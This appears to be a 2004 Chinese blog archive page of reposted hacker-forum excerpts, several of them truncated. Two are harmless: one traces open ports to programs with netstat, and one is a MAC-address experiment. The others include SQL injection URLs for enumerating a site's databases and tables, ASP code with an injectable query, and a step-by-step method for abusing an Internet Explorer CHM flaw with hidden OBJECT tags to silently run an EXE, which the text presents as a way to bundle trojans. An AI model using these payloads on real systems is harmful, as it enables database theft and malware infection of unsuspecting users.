日归档：2004 九月-7

转自<黑客基地> 在局域网使用中，我们常常会发现系统中开放了一些莫名其妙的端口，这就给系统的安全带来了一些隐患。为了让端口的使用尽在掌握之中，一些朋友就会使用第三方工具来进行检查出使用端口的特定程序究竟是谁，但实际上我们完全不必这样兴师动众，因为Windows已经内置了这个功能，下面让我们来学习一下吧！ 　　查看端口开放情况 　　稍有经验的网管就会知道使用Netstat命令可以查看系统当前开放的端口有哪些，但你知道吗？如果在使用Netstat命令的同时加上参数“-o”的话，就可以让我们进一步知晓端口的关联进程标识符 (PID)了，也就是说这个PID可用来确定哪个进程(程序)在使用特定的端口。例如，现在使用“netstat-ano”命令后可以发现端口3026、3030、3728在开放(如图1所示)。 　　从上图中并不能直接看出这三个端口的关联进程是谁，但我们却可以通过PID信息知道是628这个进程在使用这三个端口。 图1 查看端口 激活进程PID 　　既然知道系统中有个PID为628的进程，那么就来看看它究竟是谁。大家都知道，查看系统进程可以使用同时按“Ctrl+Alt+Delete”组合键的方法，在打开的“Windows任务管理器”的“进程”选项卡中进行。但默认状态下，“进程”选项卡中是没有PID这一项存在的，这样我们就无法知道进程相对应的PID是什么了。因此，要首先激活进程对应的PID项显示状态才行。方法如下： 　　单击“Windows任务管理器”窗口中“查看”下的“选择列”菜单项，然后单击选中“PID”(进程标识符)复选框(如图2所示)。 图2 选择进程PID 图3 Windows任务管理器 　　稍后在“Windows任务管理器”窗口“进程”选项卡的列表中就会发现多出了PID这一项，接下来只需按从大到小的顺序查找到PID为628的进程后，就可以发现“幕后程序”究竟是谁了(如图3所示)。 　　通过上图中显示信息可以发现，原来使用端口3026、3030、3728的关联PID是628，而使用PID为628的应用程序是“MSN Messenger”！！瞧，我们已经轻易地为端口找到的“另一半”了！

转自<黑客基地> 看了臭要饭写的跨库查询，我整理了一下从暴库到暴出密码等的一般 步骤，使得思路更清晰些。 SQL INJECTION 灵活多变，注入的语句不一，下面只提供暴库的一般 步骤，希望能对你有帮助。 1:暴出所有库名. http://www.***.com/***.asp?id=1 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9…. 得到更多的数据库名 2：暴出库中的表 假设存在一个bbs的数据库,提交下面的语句： http://www.***.com/jump.asp?id=1 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 来得到一个表 假设为 admin 提交： http://www.***.com/jump.asp?id=1 … 继续阅读 →

转自<黑客基地> 作者： 菜鸟008 　　来自：流星驿站 暑假在家好无聊，无事可做，就到网上溜达溜达，发现N多的站点有洞洞，以前别人说中国的网络安全性是多么的差，我还不相信，现在终于相信了哦！我和某些开发ASP的人员聊过…有些人员对SQL注入，用户密码需要加密保存了解的甚少……汗……切入正题吧……由于SQL INJECTION是脚本与数据库相结合的攻击方式，所以防范这种漏洞，要从脚本和数据库两方面下手……本文主要针对一些无ASP基础，网站形式为代码站下载摸板使用的用户。本文就以我们的天空个人主页系统为例， 我们的天空主要功能有新闻，相册，日记，留言本，文章，计数统计，作品展示。界面非常漂亮，非常适合做个人主页……我们就从这里下手吧！打照自己的安全小站！ 我们的天空，演示地址：http://dong.6088.net 站里面有下载，下载下来看代码吧打开shoupic.asp代码如下: <!–#include file="conn.asp"–> <!–#include file="jbsz.asp"–><%dy_id=request.QueryString("id")if dy_id<>"" thenset rs=server.CreateObject("adodb.recordset")sql="select * from dy_load where dy_id="&dy_idrs.open sql,conn,1,1%><title><%=dy_name%>风采</title><body oncontextmenu="return false" onselectstart="return false" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" ><table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="100%" align="center" … 继续阅读 →

转自<黑客基地> 作者：嘟嘟　QQ:977257 如果你打开此页看到了类似下面的这个程序窗口，那我就“恭喜”你有“洞洞”了^O^ 此漏洞被发现已不是一天两天的事了，考虑到用户的安全等因素，微软以及一些安全组织并没有公开发布此漏洞，只是近日发现网络上有越来越多的利用该漏洞捆绑木马的网页后美国计算机应急响应小组(Computer Emergency Readiness Team，简称CERT) 才正式公布了微软IE浏览器中存在的一个最新漏洞，目前这一漏洞还没有完善的解决方案，用户即使采取了一定的保护措施仍然不能完全避免该漏洞所带来的危险。利用这一漏洞，入侵者可以欺骗IE浏览器中的InfoTech Storage(ITS)协议处理器，使之从其它域获取脚本，并获得同目标计算机上本地区域相同的权限。CERT指出，入侵者在访问某一网站时通过使用一个特殊的URL地址就可以执行上述脚本，从而获得他人的信用卡信息甚至是造成整个网络瘫痪。这一漏洞的工作原理如下：IE浏览器通过ITS或者MHTML协议来标识一个不能访问或是不存在的MHTML文件；当IE浏览器没 有发现编译完成的HTML帮助文件(CHM)时，ITS协议处理器就可能会受到欺骗从而访问来自其它域的CHM文件。此时入侵者就可以通过对CHM文件进行精心设计，使之包含可以从其它域执行的脚本，从而交叉域安全模式也就被入侵者攻破了。 闲话少说，立即进入正题。实现起来非常简单，相信稍微懂一点Html的人都能手动实现的。 第一步：写一个能够自动运行EXE文件的网页，文件内容很简单，如下： <BODY onmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" ondragstart="return false" onbeforecopy="return false" oncopy=document.selection.empty() onselect=document.selection.empty()><OBJECT id=RUNIT codeBase=IEPack.exe type=application/x-oleobject height=0 width=0 OBJECT> Body标签内进行了一些访问控制，屏蔽了鼠标进行选择、屏蔽鼠标右键、屏蔽鼠标的拖拽操作、防止Copy等等。第二个标签是负载EXE的代码，通过OBJECT标签负载一个二进制文件，注意这里的type类型为"application/x-oleobject"，上面的代码在object中加入了一个名为"IEPack.exe"的执行文件，如果这时直接打开此html，你就会发现EXE文件也神奇的运行起来了，聪明的你是不是已经看出来点什么了？ 第二步：将上面的的代码存成文件，暂定为"chm.html"，并且把object标签内设定的EXE文件和网页放在同一个目录。不要以为这样就能运行了，IE不会主动下载服务器上的执行文件的。当然办法是有的，随便找个CHM制作工具，将这个页面和EXE文件一并打入CHM后打开CHM文件你就发现EXE也是同样的运行起来了。在这里我推荐用EasyCHM，很好用的。下载地址？？~!@#$%^自己用狗狗搜去吧。 第三步：这一步最关键，这也是利用漏洞之所在！ 再建立一个htm文件mm.htm，写入以下代码： <BODY onmouseup=document.selection.empty() oncontextmenu="return false" onselectstart="return false" … 继续阅读 →

转自<黑客基地> 作者：匙　　转自：黑基bbs原创精华版 前两天就局域网修改成统一的mac问题与古典辣M°产生了争执。 起因是争论统一的mac会不会影响网络工作。 辣M的观点是修改成一样的mac地址，不一定会影响机器上网。 我则认为修改了mac地址，交换环境就破坏了，还怎么联网啊？ 众所周知，交换机工作在ISO数据连路层。 网络数据从高层下来后，到达网络层，封装为IP数据包，在这一层的传输，只认识IP地址。再到达数据链路层的时候，封装为数据帧，在这一层，只认识MAC地址。在交换环境中，是靠着MAC来传输数据的。交换机的工作原理，大家也都知道，每一个交换机的端口都有学习功能，可以记住端口所连接NIC的MAC地址，然后有数据传输需求的时候，就会智能的建立专用传输通道，分隔了冲突域，也在一定程度上保证数据安全。可是改成同一个MAC地址，那将怎么访问呢。 为了给辣M证明我的观点是对的，我做了一次试验： A(192.168.30.1)、B(192.168.30.2)、C(192.168.30.3)，3台计算机。 A、B的MAC修改成一样。 这个时候当然A是访问不到B的，因为A访问B的数据，在交换机那里，已经不能精确的利用世界唯一的MAC来判断目标端口了！因为他们的地址是一样的，这让我想起了思科的单臂路由。但这仅仅是假设，如果要确定，A发出的数据是立即向与B具有同一个MAC的自己转回来，还是向所有具有相同于B的MAC的端口（包括自己）转发数据帧，最好利用嗅探来确定。而且交换机的说明中绝对不会告诉你，交换碰到一样的MAC怎么处理。毕竟交换机的产生基础就是唯一的MAC地址。 总之，A和B之间访问不到了。我确定。不管是网上邻居，还是PING，还是用别的应用层软件，都不能够互相访问。 结论一：局域网出现了相同的MAC的机器，之间不可以互相访问。 现在说说C，他的MAC地址和A、B的不一样，直到现在看上去好像并没有受到影响。 现在C来PING机器A： D:\Documents and Settings\Administrator>PING 192.168.30.1 -t Pinging 192.168.30.1 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Reply from 210.72.28.253: … 继续阅读 →